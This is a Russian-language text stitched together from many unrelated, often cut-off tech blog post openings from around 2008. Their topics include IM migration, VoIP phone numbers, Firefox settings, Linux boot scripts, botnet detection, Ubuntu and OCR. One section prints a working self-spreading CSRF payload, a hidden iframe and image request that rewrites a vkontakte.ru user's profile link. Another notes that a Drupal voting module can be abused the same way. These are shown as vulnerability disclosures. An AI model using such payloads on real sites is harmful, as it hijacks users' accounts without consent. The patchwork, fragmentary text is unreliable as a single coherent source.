В предыдущей части я начал рассказывать про попытку миграции с одного IM-клиента на другой, а именно с Pidgin на GoogleTalk (написание происходило одновременно с изучением предмета).

Что ж, принимаю поздравления, миграция успешно удалась!

Если помните, оставались нерешёнными всего несколько проблем:

• ICQ/AIM интеграция, т.е. как научить GTalk общаться с ICQ-контактами
• создание «несколькострочных» сообщений, т.е. как выполнить возврат каретки не отправляя сообщение.
• раздельно изменять размеры шрифта в ростере и в окне беседы

Приступим:

ICQ/AIM

Вчера прикрутить аську в десктопной версии GTalk'а простым каким-нибудь способом не удалось и я решил пойти на эксперимент. Общаться в асе прямо через вебморду гмэйла. Эксперимент закончился практически так и не успев начаться — юзеры мои сообщения получали нормально, а вот я, в основном, видел их ответы в форме некрасивых кракозяблов. Т.е. то ли что-то не срослось, то ли еще чего, но с такими кодировками особенно не поживёшь.

Но отступать не хотелось и решено было заюзать упоминаемые вчера костыли в виде Psi и jabber-транспортов. Всё оказалось не так страшно, хоть и немного муторно.

Защел недавно на сайт замечательного сервиса gtalk2voip.com посмотреть какие новые фенечки появились и увидел интересную новость за 29 января о сервисе www.groovytel.com
Вкратце — персональные американский телефонный номер с возможностью переадресации на Google Talk, MSN Messenger, Yahoo Messenger, Free World Dialup, Gizmo5. При регистрации позволяют выбрать номер из 3 предложенных, мне выдали вида +15672587XXX. Действительно работает проверял только на gtalk. При осуществлении звонка — в gtalk поступает вызов от абонента с номером телефона (если определяется).

Схожие сервисы: gobaza, jetnumbers.

Update:

Побродив по просторам интернета обнаружил еще один сайт www.ipkall.com имеющий перед groovytel большие преимущества (для меня лично) в возможности использования в хардварных решениях (поддерживает SIP и IAX). Настроил переадресацию на аккаунт sipnet.ru который заведен на AudioCodes MP-202. Теперь для приёма звонков компьютер не требуется и можно пользоваться обычным тел аппаратом =)

Также бесплатный тел. номер в Германии (Мюнхен) вида +49 (89) 721010 XXXXX
дает sip оператор www.bluesip.net переадресацию на другой sip аккаунт не поддерживает.

Большой список DID провайдеров www.voip-info.org/wiki/view/DID+Service+Providers

Обнаружил забавную атаку на сайт vkontakte.ru.
При переходе на сайт tvoydohod.com, если вы в этот же момент авторизованы на вконтакте, отработает следующий джаваскрипт:

<script>
function doit() {
  var html;
  html = '<img src=http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com>';
  window.frames["frm"].document.body.innerHTML = html;
}
</script>
<iframe name="frm" onload="doit()" width="0" height="0"></iframe>

Как видно, будет запрошена картинка с адресом vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com, броузер сделает запрос по этому УРЛу, и на анкете в vkontakte ваше поле «Веб-сайт» станет равным tvoydohod.com.
Затем в вашем профайле, ваш друг, который вам доверяет кликнет на этот линк, и изменит профайл себе… И т д.

Этот вид атак называется Cross Site Request Forgery. В вики описаны все противоядия и куча полезной инфы.

Сам по себе CSRF довольно скучен. Но в данном случае забавно то, что каждый заразившийся становится разносчиком CSRF-линка.

Отписал в тех-поддержку, где столкнулся с «Это не баг!», «Не кликайте по подозрительным ссылкам!» и прочим. Надеюсь пользователей они ценят и поправят.
А вам было интересно узнать о таком простом «вирусе», который живет целиком в соц-сети =)

После прочтения поста о уменьшении расхода оперативной памяти в FF, я решил залезть поглубже в страницу настроек about:config и отыскать там что-нибудь интересное. Забегая вперёд, скажу, что поиски мои увенчались успехом.
Начну с того, что все изменения вы можете сделать в файле ..\Mozilla Firefox\greprefs\all.js или в папке с настройками вашей конфигурации, хранящимися в C:\Document and Settings\ или ~/.mozilla/firefox в Виндовсе и Линуксе соответственно. Как вы уже заметили, Лис хранит настройки в js, да ещё и для каждой настройки вызывает специальную функцию pref(prefName,value), а сама функция находится в файле ..\Mozilla Firefox\defaults\autoconfig\prefcalls.js! Вот так-то.

Update: Статья и скрипты были обновлены в марте 2013 (прошло 5 лет, старые скрипты не сильно отличаются от текущих, но всё-таки лучше изучать актуальный код, а логика загрузки системы за эти годы немного изменилась — иначе работает udev, появились новые синтетические fs вроде devtmpfs, /var/run переехал в /run, etc.).

Когда я осваивал Linux, мне было очень интересно что происходит при загрузке системы. Попытка разобраться в процессе загрузки привела меня в исходники загрузочных скриптов (/etc/inittab, /etc/rc*, /etc/init.d/*, ...) и их конфигов (/etc/sysconfig/*, /etc/cond.f/*, ...). Надо отметить серьёзные размеры и сложность этих скриптов — чтобы в них разобраться потребовалось немало времени. Но я в те времена искренне верил, что загрузка это сложный процесс, и что размеры и сложность загрузочных скриптов вполне оправданы.

Когда меня окончательно достал RedHat (2001 год), я решил собрать свой дистрибутив на базе LFS. Для своего дистрибутива пришлось самостоятельно разрабатывать загрузочные скрипты, и тут-то выяснилась правда: ничего сложного в процессе загрузки нет!

Встречаем BlueProximity — небольшое приложение, следящее за bluetooth-устройством (мобильным телефоном например), и, при значительном удалении этого устройства, блокирует рабочий стол (или выполняет любое другое действие на ваш выбор).
Адрес проекта на sourceforge.
Обсуждение на ubuntuforums
P.s: Определённо решение отнюдь не универсальное и спорное, но думаю найдёт нишу для применения.

Забавная мушка, не правда ли? С другой стороны что тут забавного? Обычная пиксельная мушка. Но не было бы здесь этого поста если бы всё было так просто. Этот представитель отряда двукрылых создан с помощью блокнота и языка программирования созданного специально для целей пиксельной анимации и её же озвучивания. И так встречайте:

В технологическом университете Джорджии разработали прототип программы BotSniffer (научная работа в PDF), которая способна самостоятельно находить ботнеты, анализируя сетевую активность отдельных компьютеров в сети. Программа выявляет паттерны, характерные для заражённых зомби-ПК, затем внедряется к ним в сеть и выходит на управляющий сервер (C&C) ботнета. Обычно управляющий сервер работает через IRC или HTTP, и BotSniffer поддерживает оба режима работы.

BotSniffer не нуждается в базе сигнатур или списке IP-адресов, чтобы начать работу. Он выявляет боты и находит C&C-серверы даже в том случае, если трафик между ними зашифрован. Дело в том, что все боты демонстрируют одинаковое поведение. В один и тот же момент они одновременно начинают или рассылать информацию, или сканировать сеть. Программа определяет эти паттерны. Затем можно очень быстро блокировать передачу команд по сети, то есть обезвредить боты. Исследователи объясняют, что механизм передачи команд от C&C — это самое слабое звено ботнетов.

Прототип системы разработчики реализовали в виде плагина к популярной открытой программе обнаружения вторжений Snort, но BotSniffer поставляется отдельно и не включен в базовый дистрибутив Snort. Система BotSniffer займёт достойное место в списке антиботовских утилит, наряду с аналогичными программами BotHunter, BotMiner и BotProbe. Все они действуют разными методами.

via NetworkWorld

В I квартале 2008 года компания «Бизнестехнология» планирует выпуск редакции Корпоративной информационной системы Millеnnium BSA по лицензии свободно распространяемого программного обеспечения. Условия лицензии обеспечивают свободное использование, распространение и модификацию программы. Уникальные преимущества продукта – это функционал полноценной системы управления предприятием ERP, системы управления отношениями с клиентами CRM, системы управления бизнес-процессами BPM и адаптация к законодательству РФ. Технологические особенности – кроссплатформенность, использование открытых стандартов и свободно распространяемых программных продуктов, сверхтонкий web-клиент с богатым пользовательским интерфейсом. Выпуск редакции Millennium BSA по лицензии свободно распространяемого программного обеспечения отражает идеологию компании, основанную на поддержке, продвижении и использовании свободных продуктов.

Таков официальный анонс на странице компании «Бизнестехнология». При более внимательном изучении описания системы выявляются следующие моменты:

1. Кроссплатформенность. Система не привязана жестко к определенной СУБД и основывается на Java.
2. Гибкость. Ну это понятно, все основывается на модулях, к слову, их список радует — практически все, что нужно для хорошей жизни, в нем имеется.
3. Само собой разумеющаяся полная открытость.

Остальные нюансы и технические подробности можно рассмотреть в описании системы.

Меня же, например, более всего привлекают именно вышеперечисленные три пункта. Будем надеяться, что выход данного продукта не обманет ожидания. Если данная система окажется достойным конкурентом платным решениям от Microsoft и Oracle — это будет серьезным прорывом в области открытых решений применительно к РФ и странам СНГ.

Прекрасно понимаю, что я — как член сообщества хабры — должен во сне отбивать одним мизинцем левой ноги , но все-таки предпочитаю использовать минимальные средства автоматизации жизнедеятельности.
Посему предлагаю иметь минимальный редактор при постинге комментариев, включающий наиболее используемые теги.

p.s. Прошу простить за возможный повтор предложения -- я на хабре недавно и все еще не привык использовать мизинец левой ноги. ))

Upd. в этом комментарии к топику дается весьма дельный совет, а именно: пройти в этот топик и узнать, как решить поставленную задачу.

Давным-давно линукс для обычного пользователя windows был чем-то заоблачным и непонятным, а уж линукс на мобильных устройствах тем более. Конечно, многие продвинутые помнят о Sharp Zaurus, но основная масса округляет глаза и думает что это консоль аля дос и все. Увы, это не все :) Когда я случайно забрел на сайт, посвященный портированию линукса на различные платформы наладонников, то решил попробовать «поженить» свой кпк и один из дистрибутивов мобильной ос. Надо же как-то использовать пылящееся на полке барахло :)

После того как мы установили соединение с интернетом — мы получаем один из мощнейших инструментов решения проблем в Убунту — Гугл. Им придется пользоваться часто, так как далеко не все проблемы в Убунту решаются тривиально.

Настройка репозиториев

В Убунту существует пакетная система. Каждый пакет — это часть определенного программного обеспечения. Устанавливая пакеты — мы устанавливаем новые программы, библиотеки, документацию и другие ресурсы. Репозитории — это хранилища пакетов. Так как мы настроили интернет — теперь мы можем скачивать все необходимое оттуда.

После событий на хабре потестировал локальный drupal-сайт, потом повторил эксперимент на drupal.ru
А ведь замечательный модуль vote_up_down можно крутить для любого топика в любую сторону с помощью банального добавления нужной урлы в src картинки и это практически самое безобидное что можно делать.
Хотелось бы выслушать мнения по этому поводу.

P.S. А вы говорите: "ноутбук за 100 доларов каждому африканскому ребенку социальная сеть за 300 доларов и 7 дней на drupal".

Итак, дамы и господа, представляю вам небольшой обзор программ, нужных для свежеустановленной Kubuntu.
Я очень ленив, поэтому я использую GNU/Linux, а не Windows.
Предупреждаю, что методы установки софта могут быть неэкономны с точки зрения расхода траффика.
Все, предлагаемое вашему вниманию, мной проверено, но я не несу никакой ответственности за проблемы, которые могут возникнуть после вызова сатаны выполнения команд.
И добавлю, что это — возможно — даже не unix-way!
Ну что же —

В последнее время на drupal.ru и habrahabr.ru частенько проскакивают темы вроде: «Делаю социальную сеть – бюджет пара сотен! Помогите сделать хабрастартап!» Отечественные аналитики связывают эту тенденцию с тем, что кризис на ипотечном рынке США тянет вниз за собой рынок в целом, что заставляет игроков на бирже вкладывать в высоколиквидные и надежные активы. Традиционно прибежищем инвесторов в смутные времена является золото, медь да стартапы на просторах бывшего СССР.

Как быть, если денег и других ресурсов пока нет, а вот почувстовать себя Денискиным или Андреевым хочется уже сегодня? Попробуем исполнить соцзаказ и попытаемся по-быстрому сделать сайт напоминающий хабр.

16 января было объявлено о выпуске учебника Ubuntu 7.10 (Ubuntu 7.10 Desktop Course). Курс довольно объёмный: для того, чтобы полностью освоить 10 уроков, потребуется 2 дня. Помимо обучения возможно использование книги как справочника для поиска ответов на возникающие вопросы.

На дигге была найдена интересная ссылка (PDF-версия) — описание более, чем 350 команд Линукс (на английском языке). Фактически представляет собой шпаргалку, где команды разбиты на категории. Отмечу, что это не простой список команд, а именно описание с применением. Чтобы не быть голословным приведу несколько примеров.

Вышла новая версия краткого справочника по работе с PostgreSQL 8.3.

скачать в формате PDF/A4

скачать в формате HTML

---

оригинал материала

Новости Web 2.0, Веб сервисы, Социальные сети, Мэшап, AJAX, Теги

Клинопись — именно так переводится слово «cuneiform» с английского языка. Правда я немного забежал вперед. Вернемся к первому слову из заголовка. FineReader — идеальное решение для тех, кому нужен высочайший уровень точности распознавания и сохранения оформления текстов, как написано на сайте компании ABBYY. Все очень хорошо, но купить для дома ее, увы, не совсем (или совсем не) рентабельно. Правда есть выход, возможно даже парадный.

Алекс Искольд, предприниматель и один из основных авторов известного блога Read/WriteWeb, опубликовал список полезных советов для стартапов. Этот список составлен по материалам многочисленных публикаций автора, он содержит 36 пунктов по пяти темам: разработка кода (8), инфраструктура веб-проекта (5), пиар (11), участие в конференциях (7), юридические и финансовые советы (5).